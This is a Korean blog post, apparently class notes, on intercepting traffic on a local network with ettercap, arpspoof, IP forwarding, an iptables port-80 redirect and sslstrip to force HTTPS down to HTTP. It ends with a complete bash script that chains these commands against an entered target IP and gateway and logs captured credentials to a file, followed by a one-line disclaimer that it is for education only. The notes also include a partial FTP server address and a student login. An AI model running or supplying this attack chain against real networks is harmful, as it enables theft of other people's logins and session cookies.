336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.



ettercap -G



target1 

-> host -> 상대 윈도우 


target2 

-> ssh접속 서버 -> 상대 리눅스 




arp table을 꼭 확인하고 공격을 하도록 -> arp spoofing이 잘 되어 있는지 확인 

     -> arp redirect 공격이 들어온건 아닌가 확인 

-> ettercap 내에 host scanning 확인 


-> arp spoofing 수동실행하여 arp spoofing 



one-way poison 을 할 경우 잘 적용이 안됨 


putty에서 SSH 2 / 2 only로 할 것인가 



--------


http -> tcp + http -> 암호화 안 됨

https -> tcp + ssl + http -> 암호화 -> 허나 깨졌음 


443 https



https를 강제로 http로 쓰게 만들어 스니핑 

-> 구글 크롬에서는 공격이 안먹힘


https를 요청할때 중간에서 spoofing 하여 다시 대상에게

http로 접속하라고 reply


서버에게도 https reply를 되 돌려줘 버림 -> 대상에게 https를 전송하지만 -> http로 된다 ???




cookie

대량의 세션 유지 


쿠키의 유효기간 

쿠키 가로채기



SSLstrip

파이썬 2.4


구글, 페이스북에도 무선상태에도 됨

스마트폰에도 됨 


echo 1 > /proc/sys/net/ipv4/ip_forward          // fragrouter 의 역할을 함 

-> 값을 1로 덮어써서 forwarding 가능하게 함 -> vim으로는 수정 불가 


arpspoof -i interface -t 정상사용자 IP GWIP


대상 통신 대체 포트 설정

iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000



포워딩 -> fragrouter


python sslstrip.py -w [SSL 연결정보 저장할 파일명] -ㅣ [포트]

          [절대경로]      


tail -f secret223    -> 실시간으로 확인 


sslstrip.tar.gz




------



리눅스에서 ftp 사용 


apt-get install filezilla 


없으면 ...


ftp 61.76....

stu2...

비번


cd /p/network/ssl

get 파일명 



------------


나만의 툴 만들기 



#!/bin/bash


echo target ip input:

read target_ip


echo gw ip input:

read gw_ip


echo target ip : $target_ip

echo g w ip: $gw_ip


echo 1 > /proc/sys/net/ipv4/ip_forward    

arpspoof -i eth0 -t $target_ip $gw_ip &

iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

python sslstrip.py -w ./keylog -ㅣ 10000


---------

종료 시키기


killall -9 arpoof python


-----------



**

교육용 소스일뿐 악용시 전적으로 본인의 책임임

**






'Network' 카테고리의 다른 글

many types of dos attacks  (0) 2014.09.30
sidejacking and hping3  (0) 2014.09.29
spoofing, sniffing and redirection  (0) 2014.09.25
spoofing  (0) 2014.09.24
spoofing  (0) 2014.09.23
Posted by af334